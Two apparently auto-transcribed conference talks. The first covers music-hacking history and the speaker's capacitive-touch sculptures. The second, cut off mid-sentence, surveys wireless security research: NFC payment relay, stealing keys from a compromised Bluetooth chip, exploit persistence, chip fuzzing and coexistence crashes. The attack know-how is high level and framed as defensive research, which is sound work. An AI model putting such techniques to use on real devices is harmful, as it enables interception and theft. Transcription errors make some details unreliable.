this were as I say these these French guys in in Paris and in music Concret and they were doing it and due to modern music digital preservation techniques you can hear these the signs that they were making on YouTube you can spend some time and listen to that and I won't lie they sound pretty awful and nobody wants to listen to that I mean unless you're a true enthusiast and but it's not it's not that the music they were making is where the techniques that they were creating their experimentation sounded terrible but actually was incredibly influential and we use sampling now as just an ordinary thing but this was the technology behind it and it really came to a head in the 1960s when and beetle the Beatles were the first people to use this technique on tomorrow never knows now normally I well I would play this but when I did a talk similar to this at the Hackaday Super Conference they and they pulled my livestream because there was a 10-second snippet of the Beatles so I've decided not to risk it today and you can look up tomorrow who never knows and you can hear these kind of signs and that's actually flipped that's just flipped signs so that all of the Beatles brought in signs from their home they flipped it around speeded it up and slowed it down there's a famous like very high-pitched signed in that song and it's just Paul McCartney laughing and they've manipulated using sticky tape and scalpels anyway so that was the beginning of these new production techniques right you can use these in modern music you know in your Ableton or your logic or whatever you know those are just standard features but this was the beginning of it and it's incredibly influential I could follow it down this path and I'm actually gonna take take this to leave them to go on with their modern mainstream production and I'm gonna talk about this woman instead who was one of my favorite things about Hacker culture is the way that we learn from each other and the way that we riff off of each other's work and so I'm gonna go slightly sideways and talk about this artist and engineer's her name is Daphne Orham and who's heard of Daphne Orham all right about ten of you which is more than usual actually to be honest and so Daphne Orham is everyone should know her name and that's why I never shut up about her and she was a musician and physicist and electronics engineer who was unfortunate enough to be a woman and was has a pretty tragic work history but she she's one of the iconic figures of early electronic music she should be as well known as you know any of the as Moog or whatever but anyway so she's a trained musician and she got a job at the BBC queuing up these real-to-real magnetic tape recorders which is actually a pretty big deal at the time for a woman as well so she would she went on a training course to Paris and just studio recording techniques you know standard corporate training right and and while she was there and I believe she met some of the people behind the music concrete and she was basically and they showed her what she they were doing and it totally blew her mind she was like oh my god I'm gonna take this back to the BBC it's gonna be so cool I'm gonna revolutionize everything it's gonna be awesome and she took it back there and predict a bill now five years like no go back to pressing buttons so she did but she also would run around the BBC late at night after hours and stealing bits of equipment from other people's studios and wheeling them into her own studio and she would experiment with all these music congrats methods there's even she and as an as an electronics person as well and she was one of the first people in the world to make purely electronic music but she she was one of the first instances of someone who recorded her oscilloscope and then started using that for compositional purposes as well and she was doing this for maybe five six seven years and and at the end of that she started to get some interest she managed finally to convince somebody to give her a commission to create some incidental music for a piece of for a show and and and it was a success and also people hated it of course and but enough people wanted her to repeat it that eventually the BBC gave her own studio which is like absolutely you know out of the question for someone in the 50s for a woman in the 50s and so she she was starting to make this but and she and fortunately at this point it's called the BBC radio phonic workshop which is one of the most iconic sound design workshops and studios in the whole history of music technology so she starts this workshop the BBC radio phonic workshops but a year later she leaves and to start her own artist practice because they they said she said they wanted my ideas and they wanted my work but they didn't want me and so she had to leave her life's work and she was largely erased actually from everything that she did even though she found it this iconic this absolutely iconic workshop and she went off and created you know she didn't have a sad life after that but she she went off and created in this wild synthesizer which is in the London Science Museum now it was like instead of she she loved looking at waveforms of music so she thought she would use watercolor to draw the waveforms and then have a synthesizer interpret those waveforms and that's called the Oramix machine it's like absolutely wild you can look that up on the internet as well it's cool to look at so yeah she's becoming a bit more popular now because of the work of some of the guys at the radio phonic workshop who still exist some of the old guys who go around telling cool stories about them and but also because of the woman she helped bring in and who stayed after she left and she's quite famous now because of something I'll show you it's this lady and this is Delia Derbyshire and who's head of Delia Derbyshire a lot more of you I thought so I do a Derbyshire again the same she's got a maths and music degree she couldn't get a job but she ended up basically pestering them into letting her do some interning at the radio phonic workshop and eventually got a job there and then she was the arranger and made the instrumentation for this and now I'm gonna play this for you before I do I want you to think about the facts that at the time every sound had to be physically cut and sticky taped together every sync not and I'm not and there's no multi-track recorders back then either okay so you have to it's an absolutely enormous process of recording the sound stretching the sign cutting the sign sticking it back together making it on a real recording that onto a separate real then you've got this and then you add more signs and then you have like several tapes that you have to condense into each other without multi-track technology okay they're literally on different machines shouting go at each other and that's how they were charged multi-track and but she was very blasé about it was kind of amusing because it seems ridiculous to me now to be able to compose a piece of music like that and like a jigsaw puzzle and but she she just shrugged and said well seem to work and I'm kind of charming and but yeah so that's oh no why didn't it play oh no well I'm gonna play it for you anyway oh it'sannoying to the and she also needs rollin No, no, no. No ceramic, no synthesizers exist. This was literally just a mix. And she also made her own hensher, she recorded including my favourite, which was a little walkulator. And that doesn't work. Good name. Yeah, so, they actually used a lot of electronic engineering gear in their work, it was very fun. Anyway, we don't have any more speakers, I don't want to get an electrical radiation, so let's move on. I did actually want to play one of her own songs, so that's her commercial work, but she was also an electronic experimental musician of her own. I think you kind of forget that music in the 50s and 60s actually kind of was wild as well. Let's see if we... This is one of her tracks from the 60s. It's kind of a Bion. Oh, it's... Nessie, nessie, nessie, nessie, nessie. But anyway, we recognised this track because we did sample it. So, the answer literally just wrapped over the top of this, and the rest is as a track. She made this for a science fiction show that was based on an Azimov story, and this remains for the Azimov story that it was made for has been deleted from the BBC archives, which I find to be an absolute tragedy. I would love to watch that. If you flip it back, the robotic sounds are singing praise to the master. Thank you, Daphne. So, that's my story of the BBC Radiophonic Workshop, but I wanted to leave you with a quote from one of the BBC Radiophonic Workshop engineers, unfortunately, unnamed in the documentary that I watched. I just thought this was kind of a cute sentiment. Because they were making things up, they weren't the experts in the room. They didn't know what they couldn't do. So, they just basically managed to mess around with stuff and ended up with something really special and really cool, and something that was just iconic. Some of the biggest electronic music acts in the world today still say that the work of the BBC Radiophonic Workshop was one of their big influences in life as well. So, yeah, that's the BBC Radiophonic Workshop. And I think it's really important that we allow for ridiculousness in technology, and we allow for ugly noises, and we allow for stupid things that don't fully...you don't really see what they're for. Like, the power of allowing for experimentation that isn't very successful at first, or doesn't sound successful to the outside ear is really important. So, outsiders. That was at golden age. We've got the invention of a new technology, or just a democratization, the availability of a new technology to a reasonable number of people led to this amazing sea change and the way that people made music, made digital music, and well, analog back then, but the way that we make music was changed by these experimenters. It was definitely a golden age for new techniques, but I think that we're currently in a golden age for people who are working with experimental instruments and experimental sound in general. And I think that we've got loads and loads of really exciting new technologies that are available. We've got cheap microcontrollers, we can make our own PCBs, we can make our own synthesizers, we can access people, which is really crucial. Think about it, Daphne, she didn't learn about music concurrently, she didn't find the BBC Radio Phonic workshop until she had a spark of an idea from somebody else. So, really, it's learning tools, learning techniques, gaining access to tools, learning techniques, and being inspired by other people is really, really critical for anything to really change and to really happen. But I think that at the moment, we've got really, really cool, accessible new technologies that more and more people are learning how to use and more and more are becoming much simpler as well. And crucially, people are more accessible. So, people share, particularly in our community, people share their knowledge very freely, and you don't have to be in the same room to do this. I know a bunch of people are listening on the live stream right now, so you don't have to be here to learn about things. And you don't have to be in the room to attend a workshop with somebody, right? There's these wonderful YouTube tutorials now for sharing information. And these communities are just way more accessible through online places. We've got incredible community and events as well. So, this is, I mean, I shouldn't have put the slide in here, but it doesn't matter. So, this is one of my old hackerspaces. It's a machines room in London. And it was where the music technology, one of the places where the music tech community in London was centered. They did some, it was there and the London Hack Space, but we did a lot of things with, there's a community called a Hack U-Stick that I was involved with, and we used to do a lot of events there. I'm saying that the reason I put this slide in was just to show that hackerspaces and makerspaces often have some kind of music technology partnerships. And those kind of central spaces where you can share things, share knowledge and get inspired by each other's work and also hold events is really, really crucial. Actually, I do know why I put this slide in. So, this slide, this was a wonderful space for three years. And then the landlord raised the rent four times. And this amazing community of artists and designers and music hackers was removed. And at the same time, the London Hack Space moved from central London to west London. And a bunch of other hackerspaces and fab labs closed as well just because of how expensive the center of London had become. And there's this, and as a direct result of that, I moved to Berlin. And by aligning this kind of gentrification of our hackerspaces, we actually do destroy community as much as we can create community online as well, like this. So, this is an example of awesome online community. This is a YouTube video from someone from the London music tech hacker scene, probably the most famous person from it. And it's called Sam, who goes by look-m-no-computer on the Internet. And he's an electronic engineer and general purpose weirdo, which is why I like him. And this is one of his creations. He made a Furby synth, which is as horrific as you imagine, if not more so. So, don't look that up. I mean, do look that up. But it's genuinely, be prepared to not have a nice time. But he doesn't just show his instruments. He doesn't just perform with them. He does really awesome electronics, tear-dance as well. He learned a bunch of stuff from watching his videos and looking at actually how he's done them. And that's something that's really exciting. I mean, like maybe 20 years ago, I wouldn't have had access to this kind of knowledge. I just would have, and I probably wouldn't have even known that I like this kind of stuff. You know, I wouldn't have been exposed to it. And then I certainly would have, you know, I've been going down my local pub saying, hey, who wants to work on a weird Furby instrument with me? And they'd be like, what? No? So it's kind of nice to be able to share your weird passions with other people on the Internet. And then, of course, we have, we're at one of these. This is me and my friend Phoenix. We've done a fair bit of music tech hacking together. And this is actually the British version of Kongra, an EMF camp. I guess it's the version of Chaos Camp, actually. So EMF camp, which is actually in 2020 this year. So, yeah, so it's a really cool, small hacker festival. But these kind of spaces and these kind of events really allow, I mean, I've learned so much just by being here the last couple of days. And every time we do this, we should cherish the hacker spaces and the events. And we should also support people like Sam, who makes his living through Patreon and YouTube. So it's by supporting, to make spaces and events, and also by supporting individual people who are putting the effort into create and share work, I think we can cherish this community. Okay, on to the final bit. I'm going to show you some of the cool projects that I've been working on with other people. But the reason I've chosen the ones that I'm showing you is because they're also using some of my favorite ways that you can hack on instruments. So I figured I'd show you a project, but also show you how to make, you know, how you can have a go at it. So recently I've lived in London and Berlin, and one of my favorite things to do is when I'm in a space, is to make an instrument in the context of two people's work, two or more people's work. I always find like my work is always way better if I'm collaborating with somebody else. So, you know, what they do and what I do are smushed together to create something that's better than either of us could have done on our own. And I think this is a good example if it will play. This is one of my first Sonic Circuit Sculpture creatures. This started off as a hack, just overnight hack, with my composer friend Andrew Hockey and Truth Vestini from Osh Park. And myself, obviously, and we worked together overnight to create this. So, a circuit sculpture, if you don't know what circuit sculpture is, it's basically, instead of putting your circuit inside of a box, all of the parts or the key parts of it are shown and are actually celebrated as art in their own right. So that's what circuit sculpture is. And there's a couple of wonderful people, and this is a guy called Mohit, who makes really beautiful things, and who's living in San Francisco, and then there's a guy called Jiri, who is in Prague, I want to say, and they make really, really awesome, tiny, neat things. But I'm not tiny and neat, so I make big, massive, messy things. So this is the first one I made. It was really interesting to me. I really like Capacitive Touch as a technology. It can be unreliable, but I find it kind of really fun to work with. And it's very intuitive for a musician. And then that led to me developing a second creature. I'm really inspired by kind of utopian science fiction, and I wanted to make a series of creatures that inhabited the same world and sung when you touched them. So this was the second in the series. This is a more traditional instrument. I mean, obviously, it's still weird. It's more traditional in that the first one was generative in some way, like semi-generative. And this one is more like one note per limb with two modes of modulation. This is a bass. So that's my bass creature, which I'm actually developing for a real musician now. This woman, an amazing bassist called Isaih Hassan, who is the bassist for the Savages, and just was on tour with the Pixies. And I'm making her a stage presence one, so she's going to be able to play. But that's going to be more generation-based as well. But it's kind of interesting to try and create something that in its functionality is very traditional, but in its form is really weird, and that was kind of fun to play with. But now my latest one is another creature. But this is kind of like an abstract cephalopod. It's going to be human-sized, and each of the limbs will pay a different part of the choral arrangement. And then there's like some kind of like sunlight feature at the top where you can modulate it by touching the copper rods. I've actually made a prototype which you can listen to. So this is the latest version of one of the limbs of the tentacle, which I made. It just made it for the form, but then everybody seems to really like cuddling it. It's very comforting, so I decided to make it purr after I'd finished prototyping it. So if you want to listen to my purring tentacle afterwards, you can. It does sometimes work. But I should say, actually, hello. This is machine embroidered conductive thread. So that is able then to detect capacity. That's a capacitive touch sensor, essentially. It's a tentacle. So yeah, you can listen to that afterwards if you want. It mostly works. I made it yesterday. So yeah, that's quite fun. But again, I would not have been able to create the intricate signs with the help of my composer friend. And I would not be able to get the implementation I wanted onto the Beagle board without Drew. So it's really nice to kind of like sit together and mash up your skills. Now, these all use one of these. This is another one of my instruments. This is a wearable, flexible PCB. It's going to be a vocoder, but it's not finished yet. But the reason I'm showing you that is because that's the sensor that I use. They call it the trill. It's essentially like if anybody have used capacitive touch before, you've probably used an NPR121 sensor. This is like an NPR121 sensor plus plus. It's much more, they've got, A has got like 20 something pins, which is wild. And it's way more sensitive as well. So I find it really, really great. If anybody is doing stuff with capacitive touch and they're having some problems with it, A, make sure you're grounded and B, have a go on that trill. It's like 10 euros, I think, that sensor. And it's done by Bella. You can see one of their boards there. Now I'm going to do a whole slide about Bella and fun girl about them because they're my favourite technology at the moment to use for embedded systems, for embedded instruments. This is like the size, this is this big. It's based on the pocket Beagle, which is the size of a small Altoids tin. It's very, very small, but it runs, it's a full Linux computer. And it's really, really awesome, super responsive, super low latency, which is really important when you're creating instruments. But also the cool thing is it runs this. This is pure data. It's a visual programming language for sound creation. Now a lot of artists and sound designers and music creators, they use this already. This is very similar to something called Max, actually made by the same guy, but this one's open source. Yeah, so that's Bella and pure data. Definitely worth checking out if you're interested in instrument design. The reason the battle is special is because of the low latency, but also because no other, so you can't get a microcontroller that will run pure data. Except, so the Raspberry Pi does, but the latency on the Raspberry Pi is like, me. So I would always suggest if you're doing something, the baller and pure data is a nice combo. Okay, that's that one. Then the other project I wanted to talk to you briefly about is this is Ariana Grande, who you probably don't know who she is, but anyone under the age of 13 certainly will. And here she is demoing something called a Mimuglev. It's a gesture control. She's controlling, she's doing looping, she's doing effects, using, obviously, various gestures. Thank you, Ariana. So that's the, this is what she's using here. And this is coming out of London, but of the music tech company called Mimu, that was originated by Imogen Heap, if you know her. And I saw that Ariana video, and something I didn't mention is I actually do quite a lot of teaching as well. When I saw that Ariana video, I just thought, oh, my God, if I showed this to a 12-year-old girl and told them we could make one, they were going to lose their mind. So these cost like five grand, though. So I don't think I could get one for using the classroom. So I just messaged Imogen and asked her if I could make a children's version. And so I did. She said yes. And she, this is a wonderful piece of technology called the Microbit. And it's a DIY, it's like my first microcontroller that is made by the BBC. It's like 10 pounds. It's very, very cheap. It doesn't do a lot, but what it does, it does very well and very simply. And I was able to make an approximation of a $5,000 glove with a $10 microcontroller, which is what the core of the product that I made is actually. But I haven't got time to talk to you about that. That's my leather robot unicorn, like gesture control. But I can't tell you about that. This is another artist, got no time for that. So we're going on to this last one. So basically, I was able to, with one bridge, one microbit and a little bit of code, get it to work on professional music software. And this is a musician called Bishie, who's really awesome. And this is her using my $10 hack to do a very similar thing to a $5,000. And of course that's not stadium level. Ariana Grande couldn't use that on tour. But it was a fun project that we hacked together. And that is, that's my time. I have done, by the way, all of this, how I did that, that's all on my GitHub, all of the code. If you've already got on microbit, you can do it yourself. Or you can get the kits like 30 bucks. It's not very expensive. So all of that's on my GitHub, along with some weird factory signs of things. And you can follow along on my weird electronic adventures on my Twitter. I'm pretty reactive. So say hi to me. And I'll be hanging around here if you want to listen to my tentacle. So the end. Okay. Ellen Lee, whoa. Thank you. Thank you, Ellen, for this fantastic presentation. I'm wondering actually how are we going to play that thing there with the slime. Are there questions here? No? Yes, yes, online, of course. They're far more speedy than we shoot. So the question from the internet is, have you ever considered creating music without human interaction? Yes. Okay, then next one. Thank you. Good night. No, I mean, personally, I'm a very tactile person. So I like creating instruments that you stroke that are affectionate almost and kind. I like giving the things that I create some kind of persona and that you interact with them. However, a lot of people, there's a lot of people doing really interesting things with generative, non-human interactive art. In fact, the composer friend that I was talking about, Andrew Hockey, he's done a lovely, he's hacked a musical marble run. It's just automated. When the marbles go down the marble run, it will trigger generative science, which is really, really cool. There's lots of people doing it, but for me personally, I just, I know, I like touching the objects that I make. And the kind of strange person who walks around a craft store with a multimeter kind of like touching things and like figuring it out if they're conductive. Like adequately conductive. So you're measuring, I thought. So for example, in fabric stores, there might be something that's conductive that's not actually billed as conductive. Or I'll often go to art stores and craft stores or architectural supply stores. And you can find, you know, you don't have to go to Conrad. You can go to modular with your multimeter. In fact, it's actually, it's either, it's either conductive or it's not, right? You know? We believe you. I'm just imagining you there. Oh yeah, no, it's, it's, yeah. I've had some strange looks. A question here from number two, please here in the front. Have you also created instruments that actually work with the physicality of the object that you have built instead of triggering sound processing? So actually, you mean, in what way? If the tentacle itself, the sound it produces would be amplified and somehow that's the base of the processing of the actual sound that comes out. Yes, actually when the tentacle is done, it will have some kind of physical feedback loop in it that will be reactive to its, to its space, to its personal space even as well. So actually the cool thing about capacitive touch technology is if you get the thresholding right, you can not just sense touch, you can sense proximity. And that kind of also varies on how many people are in the room as well. So you can get it to react quite, not uniformly, but you can get it to react quite nicely to its environment and also the way that people are manipulating it as well. And you can also code some cool things into that as well, so basically based on the number of touches, how often people have played with it, and how people have played with it. Get that to feed back in to the music that it's making in a generative fashion. There's lots of cool things that I want to do with this next sculpture. Thanks. I'm so sad. I really have a spoiler here. I really, we have to shut this now and I would like you to ask to talk to her personally here next to the stage. Thank you all for being here. Thank you. Thank you, and a little leave for this fantastic presentation. Thank you.
I will explore the ways in which music is influenced by making and hacking, including a whistle-stop tour of some key points in music hacking history. This starts with 1940s Musique Concrete and Daphne Oram’s work on early electronic music at the BBC, and blossoms into the strange and wonderful projects coming out of the modern music hacker scenes in London and Berlin, including a pipe organ made of Furbies, a sound art marble run, robotic music machines, gesture controlled moon cellos, and singing circuit sculptures. I'll also be sharing some of own work, plus my favourite new ways to make embedded instruments, including plenty of amazing Open Source hardware and software.
10.5446/53216 (DOI)
Our next speaker is Jescar. Jescar is attending this conference since ages, like a decade? Even more? 22, 53. Long time. Sometimes she is also doing some talks here. The last one last year was about Bluetooth. There she was in depth. This time it will be a more general talk about wireless protocols, NFC, LTE, Wi-Fi, and of course, Bluetooth. So she will tell us what is broken in all those protocols. So have fun and enjoy the talk. All wireless communication stacks are equally broken by Jescar. So welcome to my talk. I thought it first to be a foundation talk, but it will also have new topics about everything that is kind of fundamentally broken in wireless communication. And it will cover anything in your smartphone. So like NFC, Bluetooth, Wi-Fi, LTE. You could order them by communication range or by specification length or lines of code. But the thing is the specification length and line of code also mean increased complexity. And if there is increased complexity, you might have issues with security in it in the variant. And then there is something that is even worse than LTE, which is vendor-specific additions. That would be when you open like five instances of IDA and try to analyze where a wireless message is going and what it is doing. So most of this in this talk will be about wireless exploitation. And the new stuff will be fuzzing techniques and a new escalation target. But everything else is more like a general view on wireless exploitation. So first to understand what the wireless exploit does is to separate it in different layers. So there is the lowest layer, which is some high-grade chip, which runs a filmware, let's say a Bluetooth filmware, which is then attached to a driver. Then there is some privilege stuff. It depends a bit on what kind of system you're on. And in the end, there will be applications. And no matter where you exploit is, on that layer that you're exploiting, some security measures become ineffective. So for example, if there is encryption and you have an exploit for that layer, it would become ineffective. And it depends. So the higher you are, the higher also the exploit prices get. So for the Wi-Fi RCE, you would be at 100K for a baseband RCE with local privilege escalation. It gets already 200K. And if it's just a messenger or something, then it's really, really high in the price. So the question is, why is this wireless stuff a bit cheaper? So while you need a certain distance, so that's probably a thing. And then also, maybe they are just too easy to find, I don't know. At least maybe for me, I don't know, for normal people. Or maybe the market demand is not that high for them. Or they are not privileged enough, I don't know. But actually they need only none or less interaction. So yeah, still a thing, I would say. So within the group I'm working at, we had a lot of wireless research. And also tools that we released. And the first one I think that was running on a mobile phone is NFC gate, which is currently managed by Max. Then there is next one, which is our largest project, which is patching of Broadcom Wi-Fi. And Matthias who did that reached his goal by just saying, I now have kind of a software defined radio in a commodity, like Broadcom Wi-Fi chip. And so he was a bit bored and kicked off two new projects before he left, which he then handed over. The first one is Qualcomm LTE. And the second one was Broadcom Bluetooth, which I ended up with. And then we have someone else who is Milan, and he's doing stuff that comes more like from the application layer. So he implemented an open source solution for Apple AirDrop that you can run on your Raspberry Pi. And well, the hacker is going to hack. So this stuff has been used a lot for exploitation, not by us, but by others. So there were three groups using next month for Wi-Fi exploitation, at least like what is publicly known and like the bigger ones. Maybe I forgot someone, but so there's a lot of exploitation going on there. Then internal blue has been used to demonstrate an attack against the key negation of Bluetooth just this August, and the open AirDrop implementation was used for some honeypots at Lecate and AirDOS, and like a lot of stuff is going on there. And then you might ask yourself like, yeah, so if everybody's using it for exploitation, why don't we just do it ourselves? And we actually did that, and we even did that for this very first project, this NFC project. And the most important thing you need to know about NFC is that the near field is not really near field. So it's just communication, but it's not near field communication, which means so if you are able to forward the communication, so for example you have like your credit card and then a smartphone with NFC, you could forward it over the cloud or some server and then to another smartphone and then to the payment terminal. And usually there's no time constraint or distance bounding that would prevent this, so you can at least forward and relay messages, and you might even be able to modify them on the way. And some students of us did like some testing and some systems of some third parties who then politely asked them to please stop the testing. So it was not really a cool thing overall, like not good to publish and so on. And the more happy I am about that there's other researchers who actually used some other tooling to look into NFC. So just this month there has been a talk at Blackhead, so not by us but by others about the Visa credit cards and it's just all broken, and it's cool that some people like to did it anyway. Yeah, so this is more about, so the NFC stuff is more about forwarding and the actual specification, but something that is also cool is if you get code execution within a chip, and this is a very different text scenario, and for Bluetooth I think it's especially bad because of how everything is designed. And the first design issue in Bluetooth is that the encryption key is stored in a way that the chip can always ask for encryption key at the host, or it's even already on the chip, and there is no kind of security there. So whenever you have code execution on the chip, it means you can get all the encryption keys, not just the active connection, and then break everything that is kind of a trusted connection by this key, and that even breaks features like the Android Smart Lock, and Android Smart Lock is the thing you can unlock your Android smartphone if you have a trusted device, and if you add this, you might do this for your car, because it's nice in your car when you have your audio and your navigation and everything without a locked smartphone, but the question is how secure is the Bluetooth of your car, would you trust that one to unlock your smartphone? I don't know. And the next thing is, so if you have code execution on a Bluetooth chip, it also means that you might be able to escalate into some other components so that you go up all the layers. Then next question is the exploit persistence. So let's say I have something that is running on the chip, and I don't know, extracting encryption keys, or doing whatever. You might ask yourself, so how long will it be on the chip? I mean, it's just a Bluetooth chip, you switch Bluetooth off sometimes, and then the specification, so just at page like almost 1,000, so that's like the first third of the specification, it says not the HCI reset command will not necessarily perform a hardware reset. This is implementation defined. Then I looked into the Cypress and Broadcom chips, and so yeah, so if you do HCI reset, obviously not a full hardware reset, it's just flashing some huge connection stuff here and there. So there is definitely memory areas where you could put your exploit, and it would be persistent. So then you might say, yeah, okay, so what do I do? I don't know. I put my smartphone into flight mode for a hardware reset that usually doesn't work. You might also reboot your phone, in most cases this works for some other coexistence stuff. I had the impression that sometimes, so it's a bit strange, it might not necessarily reset. Turning off for a while might hide reset the chip, I think, or you just put your smartphone in a blender, and then yeah, so that might turn off the Bluetooth chip, finally. So the next issue is, so let's say we have an exploit running there, but we first need an exploit. So the very first step is still missing as a building block, and after the talk last year, I did some stuff with Unicorn and fuzzing on the chip, and it was super slow, and then suddenly Jan showed up and Jan said, hey, I want to build a fully emulated chip for super fast fuzzing and attach it to Linux and everything should run as on a real system, just the over the air input will be fast, and I was like, you cannot build this for your master thesis. And then he was building that thing within three months, and the remaining three months he was writing a thesis and emails to vendors. So here we go. What does Frankenstein do? So it's running on an evaluation board of that, yeah, it's just a normal Bluetooth board that's connected to a Linux host over Uite, and the modem over the air, and then he would snapshot that thing and emulate it and give it fast input, and attach to the real host, and that means that if you find some vulnerability, it might be within all the components, so it might also be on the Linux host, or it might be something that is full stack, so you have something that starts on the chip, gets to the host, the host requests for the things, and then it goes back to the chip, so you could build like quite complex stuff. And for this, I have a short demo video. So the reason why I do this as a video is that it might happen that it finds overflows otherwise, and then also it's not super stable at the moment, so you can see it scanning for a devices, and then why you should most of the time would get my phone packets, but sometimes it would also get normal packets and like some mesh stuff, whatever. So this is Frankenstein running. Yeah, so what Jan focused on is early connection states. That means stuff where you don't need a pairing, and then he found like heap overflows there in very basic packet types, so quite interesting. And then the stuff was fixed, I think, or hope, whatever, so at least like in very recent devices. And then the iPhone 11 came out, and in contrast to the specification over the air, the iPhone 11 says, hey, I'm Bluetooth 5.1, I was like, wow, first consumer device, Bluetooth 5.1, and I was like, I don't really mind my way of the exploitation as long as I can get code execution on the chip, so if it is with user interaction and a pairing and whatever, I don't care as long as I get code execution on it. And then I was like, okay, let's add some fast cases to Frankenstein, continue fuzzing, and then I found that specific evaluation board that Jan was building this for has a problem with the heap configuration for certain packet types. And so if you change that, you would hybrid the device, I mean, I've pricked two evaluation boards trying to fix stuff, so yeah, it's just pricked. And so that means for me to continue fuzzing to write, like, to port something like 200 handwritten hoops to another evaluation board, it's almost running, so there's just some stuff with thread switching that is not super smooth yet, but like, it's almost on the next board. And further plans are to add more hardware, so we are also working on the Samsung Galaxy S10 and probably a MacBook to get it in there, so then it would not just be Linux, but at least Mac OS, maybe Android, I don't know yet. And another thing that would be cool, and also we didn't build yet, but it might be feasible with some user IPX310 over Pisa Express and with FPGA and all that fancy stuff to get real over-the-air input, which then would mean that you would have a full queue, like from over-the-air, real Bluetooth packets going all the way up and then to a host and the way back, and you could also use that just to test your new modulation scheme or whatever you want to change, so not just security. Yeah, so the next thing is, so if you have code execution, what do you do with it? And the normal approach is to try to go all the layers up, but there might also be some chip level escalation, and you might immediately see it on the next picture, so this is from a Broadcom chip, but that's something that you would also see in many other chips, which is that you have a shared antenna, and you could also have two antennas, but they are both on 2.4 GHz and it's in the very same smartphone, super close next to each other, and you would get interference, so you just have to have the same antenna and do some coordination like when it's Bluetooth sending, when it's Wi-Fi sending, so that they don't interfere. And this feature is called Coexistence, and there's tons of Coexistence interfaces, so this is just the one from Broadcom, and when I saw it, I was like, oh, Francesco, let's look into this, you know, all the Wi-Fi stuff, I know all the Bluetooth stuff, let's do something, and he was like, no, it's just a marketing feature, so that it can sell one chip for the price of two chips or something, and I was like, no, no, no, it must be an exploitation feature. So, and then to end this discussion, I went to Italy for eating some ice cream, and so reality somewhere in between, it's more like it's hard-coded blacklisting for wireless channels and stuff, it's traffic classes for different types of traffic for Bluetooth and Wi-Fi, and you can look it up in tons of patterns, and it's like super, super proprietary. And so we, let's say we played a game, which was like, I tried to steal his antenna, and he tried to steal my antenna, and so it turned out, if you do that, you can turn off Wi-Fi via Bluetooth, Bluetooth via Wi-Fi, and then, so like on most phones, you need to reboot them, some of them even reboot them themselves, so this is just like a speed-accelerated thing within Samsung Galaxy S8 that is not up to date. For iPhones, you would just immediately see a reboot without any interaction of things going off and on, so Broadcom is still in the process of fixing it, I don't know if they can fix it, but they said they could fix it, but something you should definitely fix is like the driver itself, so that the smartphone reboots and so on, so I don't know, but it would be fixed actually in iOS 13 because it mentions Francesco and me, but still on 13.3, I don't know, it's still, you can still crash the iPhone that way. But it's just some resource blocking, so it's like not a super dangerous thing, I would say, and you still need Bluetooth RCE before you could do it and so on, but still not cool that it's still not fixed. Yeah, so what about the other stacks and the escalations? So there's tons of different Bluetooth stacks, so it's really a mess, and obviously because of Frankenstein, we had this first Linux Bluetooth stack attached and so on, but yeah, so what has been there for a wireless 2017, this BlueBorne attacks, you might have heard of them and they found escalations like on Android, Windows, Linux, iOS, whatever, and then you might say, like in security, you often say, so someone looked into it, it must be secure now, and then there are so many features coming, so there's all these IoT devices, so everybody nowadays has wireless headphones and fitness trackers and Bluetooth is always on, and in the Apple ecosystem, it's really a mess, so if you have more than one Apple device, you would have Bluetooth enabled all the time, otherwise you couldn't use a lot of features, and then there's stuff like Web Bluetooth, so Bluetooth LE support from within the browser, so it's like a lot of new attack surfaces that arise since then, so I think, so that's more like my personal estimation, it's like 2020 might be more BlueBorne-like attacks. Yeah, so the saddest Bluetooth stack somehow is the Linux Bluetooth stack, so I don't want to blame the developers there, I mean it's not their fault, but it's like not enough people contributing to that project, and if you would try to analyze something that is going on in the stack, and you don't really know what is going on, you would do like get blame, whatever, and you would always see the same guy as the committer, so at least if you're on a specific problem, then there's only one person committing there, and so the picture down there actually has like the same guy twice, so this is also a bit of a pun here intended, we did some fuzzing in there, we still need to evaluate some of the results, so yeah, but I also feel like nobody is really using it, and it's kind of sad, I mean there's some Linux users I guess, but yeah. Then there is the VIRUS stack, I would say, so there's the Apple Bluetooth stack, and this one is actually three, so there is a macOS Bluetooth stack, there's an iOS Bluetooth stack, they are definitely different, and then there's a third embedded one for example for the AirPods, they are all running different things, so yeah, whatever, and then they also have tons of proprietary protocols on top of their Bluetooth stuff, that are also very special, and I had like at least two students, there's just one porting it to iOS, one to macOS, and then we also have students working on the other protocols that are on top of Bluetooth, and if you look into this it's like, what the hell, so it's really hard to reverse engineer because you have like three different implementations, and then sometimes you're like, yeah, okay, maybe it's also just bad code, and in the end, so from what I saw so far, I would say that it's kind of both, yeah, and then there is the stack that I played also a lot around with, which is the Android Bluetooth stack, and they did a lot for the security in the recent releases, and it annoys me so much that when I want to get internal blue running on it, I just echo to the serial port instead, so I bypass everything that the operating system does, and so something that Android cannot do which Apple does is, so Apple has all the proprietary protocols, something goes wrong, they immediately cut the connection, but Android doesn't because of compatibility and stuff, so you could just send garbage for like two minutes and try and see what happens, and it would continue listening and asking and confirming, yeah, but that's kind of an overall design issue, I think, and yeah, then there's Windows, and I couldn't find any students to work on Windows, so yeah, so if someone wants to do this, that would be great. And so, another stack, so that's kind of missing here is LTE, and I would call this like the long-term exploitation plan, so it's, I think it's like long-term evolution, evolution, whatever, but exploitation I think is the best thing for the E. Yeah, so we have like tons of wireless stuff where we are working on, and I mean like even PowerPC, and then there's Qualcomm and they have this Qualcomm hexagon DSP, I hate it so much, so there's even source code leaks for their LTE stuff, but it's just such a pain to work on it, so you might have noticed that Arash has this LTE project with Qualcomm, but it's just not fun, but other people were doing a lot in this area, and they've already presented here today and yesterday, so the first thing is the SIM card in the phone, so the SIM card should be a thing like from my perspective, that should be secure because it protects your key material, and then it runs tons of applications, I don't know, and then you can exploit them and get the victim's location, dial premium numbers in Launch Browser, and then I didn't really understand like there's this WIB set browser, whatever, and then there's Launch Browser, what is it, and I think it even launches a browser on the smartphone, whatever, it's just crazy, and then I was trying to call Deutsche Telecom, and I'm a business customer, so it's just like three minutes for a call for me, so giving a call there is nice, and then the first thing they told me is like, you are secure, we know you have three SIM cards and they are all up to date, so I have to say one of them is more than ten years old, but maybe it's up to date, and my answer is like, what exactly is running on my SIM card, where of course not answered, so yeah, something is running there, if you want to know more about SIM cards, there has been a talk already yesterday evening, and it's already online, and then there's also a lot of people looking into LTE, and I think the most popular one is the work by YoungDai Kim, he did even some LTE fuzzing framework that he didn't release publicly so far because of the findings, so it's like, should you publish, should you not publish, but so the findings are super interesting, and he also had students here who just did a talk this morning. Yeah, Responsible Disclosure, so that's the 